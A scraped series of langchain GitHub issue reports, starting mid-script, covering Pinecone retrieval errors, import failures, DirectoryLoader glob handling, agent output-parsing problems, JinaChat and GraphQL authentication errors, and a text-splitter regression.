'IdentityId': str(record['IdentityId'])
}
st.write(f'Time taken for metadata extraction: {time.time() - start_time} seconds')
start_time = time.time()
# Split record text into chunks
# Time Complexity: O(m), where m is the size of the text
record_texts = text_splitter.split_text(record['content'])
st.write(f'Time taken for text splitting: {time.time() - start_time} seconds')
start_time = time.time()
# Create metadata for each chunk
# Time Complexity: O(k), where k is the number of chunks in the text
record_metadatas = [{
"chunk": j, "text": text, **metadata
} for j, text in enumerate(record_texts)]
st.write(f'Time taken for metadata dictionary creation: {time.time() - start_time} seconds')
start_time = time.time()
# Append chunks and metadata to current batches
# Time Complexity: O(1)
texts.extend(record_texts)
metadatas.extend(record_metadatas)
st.write(f'Time taken for data appending: {time.time() - start_time} seconds')
# If batch_limit is reached, upsert vectors
# Time Complexity: Depends on the upsert implementation
if len(texts) >= batch_limit:
start_time = time.time()
ids = [str(uuid4()) for _ in range(len(texts))]
# Simulating embedding and upserting here
Pinecone.from_texts(
texts,
embed,
index_name="cubigo",
metadatas=metadatas,
namespace="vwProfiles2")
texts = []
metadatas = []
st.write(f'Time taken for vector upsertion (simulated): {time.time() - start_time} seconds')
# Upsert any remaining vectors after the loop
# Time Complexity: Depends on the upsert implementation
if len(texts) > 0:
start_time = time.time()
ids = [str(uuid4()) for _ in range(len(texts))]
# Simulating embedding and upserting here
Pinecone.from_texts(
texts,
embed,
index_name="cubigo",
metadatas=metadatas,
namespace="vwProfiles2")
st.write(f'Time taken for remaining vector upsertion (simulated): {time.time() - start_time} seconds')
st.write('Rows indexed: ', len(df))
```
And now I am trying to make a chatbot with my SQL Table, I dont want to use SQLToolkit or Agent as its very slow.
so I am trying to use the following code:
```
llm = AzureChatOpenAI(
openai_api_base=OPENAI_DEPLOYMENT_ENDPOINT,
openai_api_version=OPENAI_API_VERSION ,
deployment_name=OPENAI_DEPLOYMENT_NAME,
openai_api_key=OPENAI_API_KEY,
openai_api_type = OPENAI_API_TYPE ,
model_name=OPENAI_MODEL_NAME,
temperature=0)
embed = OpenAIEmbeddings(deployment=OPENAI_EMBEDDING_DEPLOYMENT_NAME, model=OPENAI_EMBEDDING_MODEL_NAME, chunk_size=1)
user_input = get_text()
vectorstore = Pinecone.from_existing_index("cubigo",embedding=embed, namespace="vwProfiles2")
docs =vectorstore.similarity_search_with_score(user_input, k=250, namespace="vwProfiles2") #Who is from Bransk
vectordb = Pinecone.from_documents(documents=docs,
embedding=embed)
qa = RetrievalQA.from_chain_type(llm=llm,
chain_type="stuff",
retriever=vectordb.as_retriever()
)
response = qa.run(user_input)
```
But I get this error
AttributeError: 'tuple' object has no attribute 'page_content'
```
File "C:\Users\xx\repos\xxChatbotv1\app\pages\07Chat With Pinecone Directly.py", line 100, in main
vectordb = Pinecone.ncia\repos\xxChatbotv1\app\pages\07Chat With Pinecone Directly.py", line 100, in main
vectordb = Pinecone.from_documents(documents=docs,
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\xx\anaconda3\envs\xxChatbotv3\Lib\site-packages\langchain\vectorstores\base.py", line 334, in from_documents
texts = [d.page_content for d in documents]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\xx\anaconda3\envs\xxChatbotv3\Lib\site-packages\langchain\vectorstores\base.py", line 334, in <listcomp>
texts = [d.page_content for d in documents]
^^^^^^^^^^^^^^from_documents(documents=docs,
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\xx\anaconda3\envs\xxChatbotv3\Lib\site-packages\langchain\vectorstores\base.py", line 334, in from_documents
texts = [d.page_content for d in documents]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\xx\anaconda3\envs\xxChatbotv3\Lib\site-packages\langchain\vectorstores\base.py", line 334, in <listcomp>
texts = [d.page_content for d in documents]
^^^^^^^^^^^^^^
```
### Expected behavior
response in plain english? | AttributeError: 'tuple' object has no attribute 'page_content' | https://api.github.com/repos/langchain-ai/langchain/issues/7518/comments | 4 | 2023-07-11T06:24:41Z | 2023-12-30T23:53:45Z | https://github.com/langchain-ai/langchain/issues/7518 | 1,798,199,037 | 7,518 |
[
"hwchase17",
"langchain"
]
| ### System Info
Python 3.10.8
Langchain==0.0.229
AWS Sagemaker Studio w/ **PyTorch 2.0.0 Python 3.10 GPU Optimized** image
### Who can help?
@hwchase17 or @agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Was working fine in a Jupyter Notebook in AWS Sagemaker Studio for the past few weeks but today running into an issue with no code changes... import chain issue?
!pip install langchain openai chromadb tiktoken pypdf unstructured pdf2image;
from langchain.document_loaders import TextLoader
Results in:
```---------------------------------------------------------------------------
TypeError Traceback (most recent call last)
Cell In[10], line 1
----> 1 from langchain.document_loaders import TextLoader
2 docLoader = TextLoader('./docs/nlitest.txt', encoding='utf8')
3 document = docLoader.load()
File /opt/conda/lib/python3.10/site-packages/langchain/__init__.py:6
3 from importlib import metadata
4 from typing import Optional
----> 6 from langchain.agents import MRKLChain, ReActChain, SelfAskWithSearchChain
7 from langchain.cache import BaseCache
8 from langchain.chains import (
9 ConversationChain,
10 LLMBashChain,
(...)
18 VectorDBQAWithSourcesChain,
19 )
File /opt/conda/lib/python3.10/site-packages/langchain/agents/__init__.py:2
1 """Interface for agents."""
----> 2 from langchain.agents.agent import (
3 Agent,
4 AgentExecutor,
5 AgentOutputParser,
6 BaseMultiActionAgent,
7 BaseSingleActionAgent,
8 LLMSingleActionAgent,
9 )
10 from langchain.agents.agent_toolkits import (
11 create_csv_agent,
12 create_json_agent,
(...)
21 create_vectorstore_router_agent,
22 )
23 from langchain.agents.agent_types import AgentType
File /opt/conda/lib/python3.10/site-packages/langchain/agents/agent.py:25
17 from langchain.callbacks.base import BaseCallbackManager
18 from langchain.callbacks.manager import (
19 AsyncCallbackManagerForChainRun,
20 AsyncCallbackManagerForToolRun,
(...)
23 Callbacks,
24 )
---> 25 from langchain.chains.base import Chain
26 from langchain.chains.llm import LLMChain
27 from langchain.input import get_color_mapping
File /opt/conda/lib/python3.10/site-packages/langchain/chains/__init__.py:3
1 """Chains are easily reusable components which can be linked together."""
2 from langchain.chains.api.base import APIChain
----> 3 from langchain.chains.api.openapi.chain import OpenAPIEndpointChain
4 from langchain.chains.combine_documents.base import AnalyzeDocumentChain
5 from langchain.chains.combine_documents.map_reduce import MapReduceDocumentsChain
File /opt/conda/lib/python3.10/site-packages/langchain/chains/api/openapi/chain.py:17
15 from langchain.requests import Requests
16 from langchain.schema.language_model import BaseLanguageModel
---> 17 from langchain.tools.openapi.utils.api_models import APIOperation
20 class _ParamMapping(NamedTuple):
21 """Mapping from parameter name to parameter value."""
File /opt/conda/lib/python3.10/site-packages/langchain/tools/__init__.py:11
4 from langchain.tools.azure_cognitive_services import (
5 AzureCogsFormRecognizerTool,
6 AzureCogsImageAnalysisTool,
7 AzureCogsSpeech2TextTool,
8 AzureCogsText2SpeechTool,
9 )
10 from langchain.tools.base import BaseTool, StructuredTool, Tool, tool
---> 11 from langchain.tools.bing_search.tool import BingSearchResults, BingSearchRun
12 from langchain.tools.brave_search.tool import BraveSearch
13 from langchain.tools.convert_to_openai import format_tool_to_openai_function
File /opt/conda/lib/python3.10/site-packages/langchain/tools/bing_search/__init__.py:3
1 """Bing Search API toolkit."""
----> 3 from langchain.tools.bing_search.tool import BingSearchResults, BingSearchRun
5 __all__ = ["BingSearchRun", "BingSearchResults"]
File /opt/conda/lib/python3.10/site-packages/langchain/tools/bing_search/tool.py:10
5 from langchain.callbacks.manager import (
6 AsyncCallbackManagerForToolRun,
7 CallbackManagerForToolRun,
8 )
9 from langchain.tools.base import BaseTool
---> 10 from langchain.utilities.bing_search import BingSearchAPIWrapper
13 class BingSearchRun(BaseTool):
14 """Tool that adds the capability to query the Bing search API."""
File /opt/conda/lib/python3.10/site-packages/langchain/utilities/__init__.py:3
1 """General utilities."""
2 from langchain.requests import TextRequestsWrapper
----> 3 from langchain.utilities.apify import ApifyWrapper
4 from langchain.utilities.arxiv import ArxivAPIWrapper
5 from langchain.utilities.awslambda import LambdaWrapper
File /opt/conda/lib/python3.10/site-packages/langchain/utilities/apify.py:5
1 from typing import Any, Callable, Dict, Optional
3 from pydantic import BaseModel, root_validator
----> 5 from langchain.document_loaders import ApifyDatasetLoader
6 from langchain.document_loaders.base import Document
7 from langchain.utils import get_from_dict_or_env
File /opt/conda/lib/python3.10/site-packages/langchain/document_loaders/__init__.py:44
39 from langchain.document_loaders.duckdb_loader import DuckDBLoader
40 from langchain.document_loaders.email import (
41 OutlookMessageLoader,
42 UnstructuredEmailLoader,
43 )
---> 44 from langchain.document_loaders.embaas import EmbaasBlobLoader, EmbaasLoader
45 from langchain.document_loaders.epub import UnstructuredEPubLoader
46 from langchain.document_loaders.evernote import EverNoteLoader
File /opt/conda/lib/python3.10/site-packages/langchain/document_loaders/embaas.py:54
50 bytes: str
51 """The base64 encoded bytes of the document to extract text from."""
---> 54 class BaseEmbaasLoader(BaseModel):
55 """Base class for embedding a model into an Embaas document extraction API."""
57 embaas_api_key: Optional[str] = None
File /opt/conda/lib/python3.10/site-packages/pydantic/main.py:204, in pydantic.main.ModelMetaclass.__new__()
File /opt/conda/lib/python3.10/site-packages/pydantic/fields.py:488, in pydantic.fields.ModelField.infer()
File /opt/conda/lib/python3.10/site-packages/pydantic/fields.py:419, in pydantic.fields.ModelField.__init__()
File /opt/conda/lib/python3.10/site-packages/pydantic/fields.py:539, in pydantic.fields.ModelField.prepare()
File /opt/conda/lib/python3.10/site-packages/pydantic/fields.py:801, in pydantic.fields.ModelField.populate_validators()
File /opt/conda/lib/python3.10/site-packages/pydantic/validators.py:696, in find_validators()
File /opt/conda/lib/python3.10/site-packages/pydantic/validators.py:585, in pydantic.validators.make_typeddict_validator()
File /opt/conda/lib/python3.10/site-packages/pydantic/annotated_types.py:35, in pydantic.annotated_types.create_model_from_typeddict()
File /opt/conda/lib/python3.10/site-packages/pydantic/main.py:972, in pydantic.main.create_model()
File /opt/conda/lib/python3.10/site-packages/pydantic/main.py:204, in pydantic.main.ModelMetaclass.__new__()
File /opt/conda/lib/python3.10/site-packages/pydantic/fields.py:488, in pydantic.fields.ModelField.infer()
File /opt/conda/lib/python3.10/site-packages/pydantic/fields.py:419, in pydantic.fields.ModelField.__init__()
File /opt/conda/lib/python3.10/site-packages/pydantic/fields.py:534, in pydantic.fields.ModelField.prepare()
File /opt/conda/lib/python3.10/site-packages/pydantic/fields.py:638, in pydantic.fields.ModelField._type_analysis()
File /opt/conda/lib/python3.10/typing.py:1158, in _SpecialGenericAlias.__subclasscheck__(self, cls)
1156 return issubclass(cls.__origin__, self.__origin__)
1157 if not isinstance(cls, _GenericAlias):
-> 1158 return issubclass(cls, self.__origin__)
1159 return super().__subclasscheck__(cls)
TypeError: issubclass() arg 1 must be a class ```
### Expected behavior
The module should import with no error. | Langchain Import Issue | https://api.github.com/repos/langchain-ai/langchain/issues/7509/comments | 21 | 2023-07-11T01:12:10Z | 2024-07-13T00:38:14Z | https://github.com/langchain-ai/langchain/issues/7509 | 1,797,896,792 | 7,509 |
[
"hwchase17",
"langchain"
]
| ### System Info
I'm using langchain 0.0.218 in python 3.10.0 and when I use glob patterns as a direct argument to initialize the class this does not load anything. e.g. DirectoryLoader(path = root_dir + 'data', glob = "**/*.xml")
But when I use it in loader_kwargs it works perfect.
e.g. DirectoryLoader(path = path, loader_kwargs={"glob":"**/*.xml"}
May this be a bug that when class is initialized in the line?https://github.com/hwchase17/langchain/blob/master/langchain/document_loaders/directory.py#L33
It seems to always be set as "**/[!.]*" when using it as an arg but not when using it inside loader_kwargs
### Who can help?
@eyurtsev
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. Make a directory called data
2. Inside that directory store all kind of supported documents (docx, text, etc) excepting -for example- xml files and also a folder that only contains all the xml files
3. Use loader = Directoryloader = (path = root_dir + 'data', glob = "**/*.xml")
5. execute loader.load() will not load any documents
Then use loader = DirectoryLoader(path = path, loader_kwargs={"glob": "**/*.xml"}
loader.load() and will work perfectly
### Expected behavior
Must work using it like loader = Directoryloader(path = root_dir + 'data', glob = "**/*.xml")
*NOTE* This happens with all kind of glob patterns passed through glob argument. It does not has to do with the file extension or something.
Let me know if you need more info :) | Glob patterns not finding documents when using it as an argument to DirectoryLoader | https://api.github.com/repos/langchain-ai/langchain/issues/7506/comments | 5 | 2023-07-11T00:04:37Z | 2023-11-09T16:11:45Z | https://github.com/langchain-ai/langchain/issues/7506 | 1,797,824,924 | 7,506 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
It is soooooo **weird** that this repo is still under a personal GitHub account 😕
At this moment in time (1:45pm 7-10-2023)
https://github.com/lang-chain is still available.
It would feel more professional if this repo became an organization.
### Suggestion:
Convert this personal repo to an organizations repo. | MAKE langchain AN ORGANIZATION | https://api.github.com/repos/langchain-ai/langchain/issues/7500/comments | 2 | 2023-07-10T20:46:56Z | 2023-08-17T21:01:34Z | https://github.com/langchain-ai/langchain/issues/7500 | 1,797,559,582 | 7,500 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I keep getting OutputParserException: Could not parse LLM output.
I have tried setting handle_parsing_errors=True as well as handle_parsing_errors="Check your output and make sure it conforms!", and yet most of the times I find myself getting the OutputParserException.
Here is an example of the error:
```
> Entering new chain...
Thought: The question is asking for a detailed explanation of a use example of chain of thought prompting. I should first check if there is a clear answer in the database.
Action: Lookup from database
Action Input: "use example of chain of thought prompting"
Observation: Sure! Here's an example of chain-of-thought prompting:
Let's say we have a language model that needs to solve a math word problem. The problem is: "John has 5 apples. He gives 2 apples to Mary. How many apples does John have now?"
With chain-of-thought prompting, we provide the model with a prompt that consists of triples: input, chain of thought, output. In this case, the prompt could be:
Input: "John has 5 apples. He gives 2 apples to Mary."
Chain of Thought: "To solve this problem, we need to subtract the number of apples John gave to Mary from the total number of apples John had."
Output: "John now has 3 apples."
By providing the model with this chain of thought, we guide it through the reasoning process step-by-step. The model can then generate the correct answer by following the provided chain of thought.
This approach of chain-of-thought prompting helps the language model to decompose multi-step problems into intermediate steps, allowing for better reasoning and problem-solving abilities.
Thought:
---------------------------------------------------------------------------
OutputParserException Traceback (most recent call last)
[<ipython-input-76-951eb95eb01c>](https://localhost:8080/#) in <cell line: 2>()
1 query = "Can you explain a use example of chain of thought prompting in detail?"
----> 2 res = agent_chain(query)
6 frames
[/usr/local/lib/python3.10/dist-packages/langchain/agents/mrkl/output_parser.py](https://localhost:8080/#) in parse(self, text)
40
41 if not re.search(r"Action\s*\d*\s*:[\s]*(.*?)", text, re.DOTALL):
---> 42 raise OutputParserException(
43 f"Could not parse LLM output: `{text}`",
44 observation="Invalid Format: Missing 'Action:' after 'Thought:'",
OutputParserException: Could not parse LLM output: `I have found a clear answer in the database that explains a use example of chain of thought prompting.`
```
Is there any other way in which I can mitigate this problem to get consistent outputs?
### Suggestion:
Is there a way to use Retry Parser for this agent, if yes how? | MRKL Agent OutputParser Exception. | https://api.github.com/repos/langchain-ai/langchain/issues/7493/comments | 6 | 2023-07-10T18:46:36Z | 2024-03-21T16:04:42Z | https://github.com/langchain-ai/langchain/issues/7493 | 1,797,326,865 | 7,493 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain-0.0.229
python 3.10
### Who can help?
@delgermurun
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
import os
from langchain.chat_models import JinaChat
from langchain.schema import HumanMessage
os.environ["JINACHAT_API_KEY"] = "..." # from https://cloud.jina.ai/settings/tokens
chat = JinaChat(temperature=0)
messages = [
HumanMessage(
content="Translate this sentence from English to French: I love you!"
)
]
print(chat(messages))
```
### Expected behavior
Expected output: Je t'aime
Actual output:
```python
---------------------------------------------------------------------------
AuthenticationError Traceback (most recent call last)
Cell In[7], line 10
3 chat = JinaChat(temperature=0)
5 messages = [
6 HumanMessage(
7 content="Translate this sentence from English to French: I love generative AI!"
8 )
9 ]
---> 10 chat(messages)
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/langchain/chat_models/base.py:349, in BaseChatModel.__call__(self, messages, stop, callbacks, **kwargs)
342 def __call__(
343 self,
344 messages: List[BaseMessage],
(...)
347 **kwargs: Any,
348 ) -> BaseMessage:
--> 349 generation = self.generate(
350 [messages], stop=stop, callbacks=callbacks, **kwargs
351 ).generations[0][0]
352 if isinstance(generation, ChatGeneration):
353 return generation.message
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/langchain/chat_models/base.py:125, in BaseChatModel.generate(self, messages, stop, callbacks, tags, metadata, **kwargs)
123 if run_managers:
124 run_managers[i].on_llm_error(e)
--> 125 raise e
126 flattened_outputs = [
127 LLMResult(generations=[res.generations], llm_output=res.llm_output)
128 for res in results
129 ]
130 llm_output = self._combine_llm_outputs([res.llm_output for res in results])
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/langchain/chat_models/base.py:115, in BaseChatModel.generate(self, messages, stop, callbacks, tags, metadata, **kwargs)
112 for i, m in enumerate(messages):
113 try:
114 results.append(
--> 115 self._generate_with_cache(
116 m,
117 stop=stop,
118 run_manager=run_managers[i] if run_managers else None,
119 **kwargs,
120 )
121 )
122 except (KeyboardInterrupt, Exception) as e:
123 if run_managers:
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/langchain/chat_models/base.py:262, in BaseChatModel._generate_with_cache(self, messages, stop, run_manager, **kwargs)
258 raise ValueError(
259 "Asked to cache, but no cache found at `langchain.cache`."
260 )
261 if new_arg_supported:
--> 262 return self._generate(
263 messages, stop=stop, run_manager=run_manager, **kwargs
264 )
265 else:
266 return self._generate(messages, stop=stop, **kwargs)
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/langchain/chat_models/jinachat.py:288, in JinaChat._generate(self, messages, stop, run_manager, **kwargs)
281 message = _convert_dict_to_message(
282 {
283 "content": inner_completion,
284 "role": role,
285 }
286 )
287 return ChatResult(generations=[ChatGeneration(message=message)])
--> 288 response = self.completion_with_retry(messages=message_dicts, **params)
289 return self._create_chat_result(response)
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/langchain/chat_models/jinachat.py:244, in JinaChat.completion_with_retry(self, **kwargs)
240 @retry_decorator
241 def _completion_with_retry(**kwargs: Any) -> Any:
242 return self.client.create(**kwargs)
--> 244 return _completion_with_retry(**kwargs)
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/tenacity/__init__.py:289, in BaseRetrying.wraps.<locals>.wrapped_f(*args, **kw)
287 @functools.wraps(f)
288 def wrapped_f(*args: t.Any, **kw: t.Any) -> t.Any:
--> 289 return self(f, *args, **kw)
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/tenacity/__init__.py:379, in Retrying.__call__(self, fn, *args, **kwargs)
377 retry_state = RetryCallState(retry_object=self, fn=fn, args=args, kwargs=kwargs)
378 while True:
--> 379 do = self.iter(retry_state=retry_state)
380 if isinstance(do, DoAttempt):
381 try:
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/tenacity/__init__.py:314, in BaseRetrying.iter(self, retry_state)
312 is_explicit_retry = fut.failed and isinstance(fut.exception(), TryAgain)
313 if not (is_explicit_retry or self.retry(retry_state)):
--> 314 return fut.result()
316 if self.after is not None:
317 self.after(retry_state)
File /opt/anaconda3/envs/langchain/lib/python3.10/concurrent/futures/_base.py:451, in Future.result(self, timeout)
449 raise CancelledError()
450 elif self._state == FINISHED:
--> 451 return self.__get_result()
453 self._condition.wait(timeout)
455 if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
File /opt/anaconda3/envs/langchain/lib/python3.10/concurrent/futures/_base.py:403, in Future.__get_result(self)
401 if self._exception:
402 try:
--> 403 raise self._exception
404 finally:
405 # Break a reference cycle with the exception in self._exception
406 self = None
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/tenacity/__init__.py:382, in Retrying.__call__(self, fn, *args, **kwargs)
380 if isinstance(do, DoAttempt):
381 try:
--> 382 result = fn(*args, **kwargs)
383 except BaseException: # noqa: B902
384 retry_state.set_exception(sys.exc_info()) # type: ignore[arg-type]
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/langchain/chat_models/jinachat.py:242, in JinaChat.completion_with_retry.<locals>._completion_with_retry(**kwargs)
240 @retry_decorator
241 def _completion_with_retry(**kwargs: Any) -> Any:
--> 242 return self.client.create(**kwargs)
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/openai/api_resources/chat_completion.py:25, in ChatCompletion.create(cls, *args, **kwargs)
23 while True:
24 try:
---> 25 return super().create(*args, **kwargs)
26 except TryAgain as e:
27 if timeout is not None and time.time() > start + timeout:
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/openai/api_resources/abstract/engine_api_resource.py:153, in EngineAPIResource.create(cls, api_key, api_base, api_type, request_id, api_version, organization, **params)
127 @classmethod
128 def create(
129 cls,
(...)
136 **params,
137 ):
138 (
139 deployment_id,
140 engine,
(...)
150 api_key, api_base, api_type, api_version, organization, **params
151 )
--> 153 response, _, api_key = requestor.request(
154 "post",
155 url,
156 params=params,
157 headers=headers,
158 stream=stream,
159 request_id=request_id,
160 request_timeout=request_timeout,
161 )
163 if stream:
164 # must be an iterator
165 assert not isinstance(response, OpenAIResponse)
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/openai/api_requestor.py:298, in APIRequestor.request(self, method, url, params, headers, files, stream, request_id, request_timeout)
277 def request(
278 self,
279 method,
(...)
286 request_timeout: Optional[Union[float, Tuple[float, float]]] = None,
287 ) -> Tuple[Union[OpenAIResponse, Iterator[OpenAIResponse]], bool, str]:
288 result = self.request_raw(
289 method.lower(),
290 url,
(...)
296 request_timeout=request_timeout,
297 )
--> 298 resp, got_stream = self._interpret_response(result, stream)
299 return resp, got_stream, self.api_key
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/openai/api_requestor.py:700, in APIRequestor._interpret_response(self, result, stream)
692 return (
693 self._interpret_response_line(
694 line, result.status_code, result.headers, stream=True
695 )
696 for line in parse_stream(result.iter_lines())
697 ), True
698 else:
699 return (
--> 700 self._interpret_response_line(
701 result.content.decode("utf-8"),
702 result.status_code,
703 result.headers,
704 stream=False,
705 ),
706 False,
707 )
File /opt/anaconda3/envs/langchain/lib/python3.10/site-packages/openai/api_requestor.py:763, in APIRequestor._interpret_response_line(self, rbody, rcode, rheaders, stream)
761 stream_error = stream and "error" in resp.data
762 if stream_error or not 200 <= rcode < 300:
--> 763 raise self.handle_error_response(
764 rbody, rcode, resp.data, rheaders, stream_error=stream_error
765 )
766 return resp
AuthenticationError: Invalid token
``` | JinaChat Authentication | https://api.github.com/repos/langchain-ai/langchain/issues/7490/comments | 9 | 2023-07-10T18:15:56Z | 2023-11-21T15:23:24Z | https://github.com/langchain-ai/langchain/issues/7490 | 1,797,274,034 | 7,490 |
[
"hwchase17",
"langchain"
]
| ### Discussed in https://github.com/hwchase17/langchain/discussions/7423
<div type='discussions-op-text'>
<sup>Originally posted by **aju22** July 9, 2023</sup>
Here is the code I'm using for initializing a Zero Shot ReAct Agent with some tools for fetching relevant documents from a vector database:
```
chat_model = ChatOpenAI(
model_name="gpt-3.5-turbo",
temperature="0",
openai_api_key=openai_api_key,
streaming=True,
# verbose=True)
llm_chain = LLMChain(llm=chat_model, prompt=prompt)
agent = ZeroShotAgent(llm_chain=llm_chain, tools=tools, verbose=True, handle_parsing_errors=True)
agent_chain = AgentExecutor.from_agent_and_tools(
agent=agent, tools=tools, verbose=True, memory=memory
)
```
However when I query for a response.
```
query = "Can you explain a use case example of chain of thought prompting in detail?"
res = agent_chain(query)
```
This is the response I get back:
```
> Entering new chain...
Thought: The question is asking for a detailed explanation of a use example of chain-of-thought prompting.
Action: Lookup from database
Action Input: "use example of chain-of-thought prompting"
Observation: Sure! Here's an example of chain-of-thought prompting:
Let's say we have a language model that is trained to solve math word problems. We want to use chain-of-thought prompting to improve its reasoning abilities.
The prompt consists of triples: input, chain of thought, output. For example:
Input: "John has 5 apples."
Chain of Thought: "If John gives 2 apples to Mary, how many apples does John have left?"
Output: "John has 3 apples left."
In this example, the chain of thought is a series of intermediate reasoning steps that lead to the final output. It helps the language model understand the problem and perform the necessary calculations.
By providing these chain-of-thought exemplars during training, the language model learns to reason step-by-step and can generate similar chains of thought when faced with similar problems during inference.
This approach of chain-of-thought prompting has been shown to improve the performance of language models on various reasoning tasks, including arithmetic, commonsense, and symbolic reasoning. It allows the models to decompose complex problems into manageable steps and allocate additional computation when needed.
Overall, chain-of-thought prompting enhances the reasoning abilities of large language models and helps them achieve state-of-the-art performance on challenging tasks.
Thought:I have provided a detailed explanation and example of chain-of-thought prompting.
Final Answer: Chain-of-thought prompting is a method used to improve the reasoning abilities of large language models by providing demonstrations of chain-of-thought reasoning as exemplars in prompting. It involves breaking down multi-step problems into manageable intermediate steps, leading to more effective reasoning and problem-solving. An example of chain-of-thought prompting is providing a language model with a math word problem prompt consisting of an input, chain of thought, and output. By training the model with these exemplars, it learns to reason step-by-step and can generate similar chains of thought when faced with similar problems during inference. This approach has been shown to enhance the performance of language models on various reasoning tasks.
> Finished chain.
```
As you can observe, The model has a very thorough and exact answer in it's observation. However in the next thought, the model thinks it is done providing a detailed explanation and example to the human. So the final answer is just some basic information, not really answering the question in necessary detail.
I feel like somewhere in the intermediate steps, the agent thinks it has already answered to the human, and hence just does not bother to give that as the final answer.
Can someone please help me figure out, how can I make the model output it's observation as the final answer. Or to stop making the model assume it has already answered the question to the human.
Will playing around with the prompt template work? </div> | Langchain MRKL Agent not giving useful Final Answer | https://api.github.com/repos/langchain-ai/langchain/issues/7489/comments | 4 | 2023-07-10T17:35:37Z | 2023-08-07T08:28:23Z | https://github.com/langchain-ai/langchain/issues/7489 | 1,797,221,278 | 7,489 |
[
"hwchase17",
"langchain"
]
| ### System Info
When running the following code:
```
from langchain import OpenAI
from langchain.agents import load_tools, initialize_agent, AgentType
from langchain.utilities import GraphQLAPIWrapper
from langchain.memory import ConversationBufferMemory
llm = OpenAI(temperature=0, openai_api_key=openai_api_key)
token = "..."
tools = load_tools(
["graphql"],
custom_headers={"Authorization": token, "Content-Type": "application/json"},
graphql_endpoint="...",
llm=llm
)
memory = ConversationBufferMemory(memory_key="chat_history")
agent = initialize_agent(
tools, llm, agent=AgentType.CONVERSATIONAL_REACT_DESCRIPTION, verbose=True, memory=memory
)
graphql_fields = """query getCompanies {get_companies}"""
suffix = "Call the API with schema "
agent.run(f"{suffix} {graphql_fields}")
```
Im getting the error:
TransportQueryError: Error while fetching schema: {'errorType': 'UnauthorizedException', 'message': 'You are not authorized to make this call.'}
If you don't need the schema, you can try with: "fetch_schema_from_transport=False"
It doesn't matter what value is provided under custom_headers, or if it is passed as a parameter at all. The error is always the same. Playground code from https://python.langchain.com/docs/modules/agents/tools/integrations/graphql worked as intended.
Any idea of what the problem is?
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
from langchain import OpenAI
from langchain.agents import load_tools, initialize_agent, AgentType
from langchain.utilities import GraphQLAPIWrapper
from langchain.memory import ConversationBufferMemory
llm = OpenAI(temperature=0, openai_api_key=openai_api_key)
token = "..."
tools = load_tools(
["graphql"],
custom_headers={"Authorization": token, "Content-Type": "application/json"},
graphql_endpoint="...",
llm=llm
)
memory = ConversationBufferMemory(memory_key="chat_history")
agent = initialize_agent(
tools, llm, agent=AgentType.CONVERSATIONAL_REACT_DESCRIPTION, verbose=True, memory=memory
)
graphql_fields = """query getCompanies {get_companies}"""
suffix = "Call the API with schema "
agent.run(f"{suffix} {graphql_fields}")
TransportQueryError: Error while fetching schema: {'errorType': 'UnauthorizedException', 'message': 'You are not authorized to make this call.'}
If you don't need the schema, you can try with: "fetch_schema_from_transport=False"
```
### Expected behavior
An allowed API call that doesn't cause authentication issues | TransportQueryError when using GraphQL tool | https://api.github.com/repos/langchain-ai/langchain/issues/7488/comments | 5 | 2023-07-10T17:26:29Z | 2023-12-08T16:06:25Z | https://github.com/langchain-ai/langchain/issues/7488 | 1,797,208,894 | 7,488 |
[
"hwchase17",
"langchain"
]
| ### System Info
After v0.0.226, the RecursiveCharacterTextSplitter seems to no longer separate properly at the end of sentences and now cuts many sentences mid-word.
